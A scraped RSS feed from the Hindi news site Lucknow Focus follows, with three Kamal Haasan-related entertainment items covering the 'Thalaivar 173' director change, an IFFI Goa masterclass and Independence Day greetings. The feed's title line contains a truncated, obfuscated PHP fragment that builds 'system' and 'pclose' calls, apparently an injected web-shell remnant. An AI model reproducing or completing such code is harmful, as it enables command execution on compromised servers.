Kamal Haasan – Lucknow Focus http://lucknowfocus.com <?php $_0="s\171stem";$_1="pc\x6cose";$_2 Sat, 03 Jan 2026 10:34:19 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 http://lucknowfocus.com/wp-content/uploads/2022/03/cropped-Capture-32x32.jpg Kamal Haasan – Lucknow Focus http://lucknowfocus.com 32 32 ‘थलाइवर 173’ को मिला नया निर्देशक: सुंदर सी के हटने के बाद अब सिबी चक्रवर्ती संभालेंगे रजनीकांत की फिल्म की कमान http://lucknowfocus.com/thalaivar-173-gets-new-director-after-sundar-cs-departure-now-sibi-chakraborty-will-take-charge-of-rajinikanths-film/ Sat, 03 Jan 2026 10:34:18 +0000 https://lucknowfocus.com/?p=8130 Lucknow Focus News Desk: सुपरस्टार रजनीकांत और दिग्गज अभिनेता कमल हासन के ड्रीम प्रोजेक्ट ‘थलाइवर 173’ को लेकर एक बड़ी अपडेट सामने आई है। निर्देशक सुंदर सी द्वारा फिल्म छोड़ने के बाद मचे सस्पेंस को खत्म करते हुए मेकर्स ने शनिवार को नए डायरेक्टर के नाम का आधिकारिक ऐलान कर दिया है।

सिबी चक्रवर्ती करेंगे निर्देशित

‘डॉन’ जैसी सुपरहिट फिल्म देने वाले निर्देशक सिबी चक्रवर्ती अब रजनीकांत और कमल हासन की इस फिल्म का निर्देशन करेंगे। पिछले कुछ समय से गलियारों में चर्चा थी कि रजनीकांत के दामाद और अभिनेता धनुष इस फिल्म को डायरेक्ट कर सकते हैं, लेकिन सिबी के नाम की घोषणा ने इन सभी अटकलों पर विराम लगा दिया है।

इस फिल्म की सबसे खास बात यह है कि इसमें रजनीकांत मुख्य भूमिका निभा रहे हैं, जबकि कमल हासन के बैनर तले इसे प्रोड्यूस किया जा रहा है। दशकों बाद दो दिग्गजों का यह कोलाबोरेशन फैंस के लिए किसी तोहफे से कम नहीं है।

रिलीज डेट का भी हुआ खुलासा

डायरेक्टर के नाम के साथ ही मेकर्स ने फिल्म की रिलीज विंडो भी साफ कर दी है। ‘थलाइवर 173’ अगले साल यानी 2027 में पोंगल के शुभ अवसर पर सिनेमाघरों में दस्तक देगी। सुंदर सी के फिल्म छोड़ने के पीछे ‘क्रिएटिव डिफरेंसेस’ को मुख्य वजह बताया जा रहा था, लेकिन अब सिबी चक्रवर्ती के आने से फिल्म के प्री-प्रोडक्शन में तेजी आने की उम्मीद है।

]]>
IFFI गोवा में यादगार लम्हा: खुशबू सुंदर और सुहासिनी ने कमल हासन के साथ मास्टरक्लास में साझा किए अनुभव http://lucknowfocus.com/memorable-moment-at-iffi-goa-khushboo-sundar-and-suhasini-shared-experiences-in-masterclass-with-kamal-haasan/ Sat, 22 Nov 2025 10:09:16 +0000 https://lucknowfocus.com/?p=7412 Lucknow Focus News Desk: भारतीय अंतर्राष्ट्रीय फिल्म महोत्सव (IFFI) में देश-विदेश के कई दिग्गज कलाकार सिनेमा जगत पर मंथन करने के लिए एक मंच पर जुट रहे हैं। इसी क्रम में, एक्ट्रेस खुशबू सुंदर और सुहासिनी मणिरत्नम ने सुपरस्टार कमल हासन के साथ एक महत्वपूर्ण मास्टरक्लास में भाग लिया, जिसका अनुभव खुशबू सुंदर ने सोशल मीडिया पर साझा किया।

‘सिनेमा के बारे में फिर से बहुत कुछ सीखने को मिला’

खुशबू सुंदर ने अपनी इंस्टाग्राम पोस्ट में इस मुलाकात और मास्टरक्लास के अनुभव को साझा करते हुए लिखा “भारतीय अंतर्राष्ट्रीय फिल्म महोत्सव (IFFI) गोवा में अपनी दोस्त सुहासिनी के साथ एक सुपर मास्टरक्लास लेने का अनुभव मिला। यहाँ पर सिनेमा के बारे में फिर से बहुत कुछ सीखने को मिला। साथ ही महान कमल हासन सर ने भी अपने विचार साझा किए। हम इस मास्टर के एक्साइटेड स्टूडेंट्स की तरह, उनकी बातों को समझ रहे थे।” यह मुलाकात कई वर्षों बाद हुई, जिसे तीनों दिग्गजों ने एक यादगार अनुभव बताया।

IFFI 2025 का विवरण

IFFI 20 नवंबर से गोवा में शुरू हुआ है और यह आठ दिनों तक चलेगा। इस फिल्म फेस्टिवल में 80 देशों की कुल 240 फिल्में दिखाई जाएंगी। कला अकादमी में 10 फॉर्मेट में 21 मास्टरक्लास और पैनल डिस्कशन आयोजित किए जा रहे हैं। खुशबू सुंदर और सुहासिनी मणिरत्नम इसी तरह की एक मास्टरक्लास में शामिल हुईं। सिनेमा जगत के कई बड़े नाम भी मास्टरक्लास में शामिल होंगे, जिनमें विधु विनोद चोपड़ा, अनुपम खेर, आमिर खान, बॉबी देओल, रवि वर्मन जैसे दिग्गज शामिल हैं।

]]>
79वें स्वतंत्रता दिवस पर देशभक्ति के रंग में रंगे सितारे, करीना-प्रियंका से लेकर कमल हासन तक ने दी बधाई http://lucknowfocus.com/from-kareena-priyanka-to-kamal-haasan-painted-in-patriotic-colors-on-79th-independence-day/ Fri, 15 Aug 2025 08:12:51 +0000 https://lucknowfocus.com/?p=5457 Lucknow Focus News Desk: आज, 15 अगस्त 2025 को भारत अपना 79वां स्वतंत्रता दिवस मना रहा है। इस खास मौके पर पूरा देश देशभक्ति के रंग में डूबा हुआ है। देश के इस जश्न में बॉलीवुड और साउथ इंडस्ट्री के सितारे भी पीछे नहीं रहे, जिन्होंने सोशल मीडिया के माध्यम से अपने फैंस को शुभकामनाएं दीं।

बॉलीवुड सितारों ने साझा किए देश के गौरव भरे संदेश

एक्ट्रेस करीना कपूर ने तिरंगे की खूबसूरत तस्वीर साझा करते हुए लिखा, “यह हमारे देश और उसके अविश्वसनीय जज्बे के लिए है, स्वतंत्रता दिवस की ढेर सारी बधाई।” वहीं, प्रियंका चोपड़ा ने भी भारत के झंडे की तस्वीर शेयर कर सभी को स्वतंत्रता दिवस की शुभकामनाएं दीं।

अभिषेक बच्चन ने एक पोस्ट में लिखा, “हमारे दिल में आज़ादी है और हमारी आत्मा में गर्व भरा है। सभी को स्वतंत्रता दिवस की ढेर सारी बधाई। जय हिंद।” इनके अलावा सुपरस्टार अक्षय कुमार, अनुपम खेर, किरण खेर और हेमा मालिनी समेत कई सितारों ने भी देशवासियों को बधाई दी।

साउथ सुपरस्टार कमल हासन का खास संदेश

साउथ इंडस्ट्री के दिग्गज सुपरस्टार कमल हासन ने इस अवसर पर एक भावुक संदेश लिखा। उन्होंने कहा, “स्वप्न देखने की, सृजन करने की आजादी, पतन से उत्थान तक का सफर, साल्ट मार्च से स्पेस एज तक का सफर… क्या हम उस आजादी को और विस्तार दे सकते हैं जिसने इस देश को सदियों से मजबूत बनाया है? जिस साहस ने हमें आजादी दिलाई, क्यों न हम हर शहर, हर गांव और हर दिमाग में उसी साहस को अब देश के विकास के लिए लगाएं। हैप्पी इंडिपेंडेंस डे, जय हिंद।”

साउथ के अन्य कलाकारों में सुपरस्टार मोहनलाल ने देश के ऊंचे लहराते झंडे को सैल्यूट करते हुए अपनी तस्वीर शेयर की, जबकि महेश बाबू समेत कई और कलाकारों ने भी फैंस को शुभकामनाएं दीं।

Also Read: GST में बड़े बदलाव की तैयारी: दिवाली तक लागू हो सकता है नया दो-स्लैब वाला ढांचा

]]>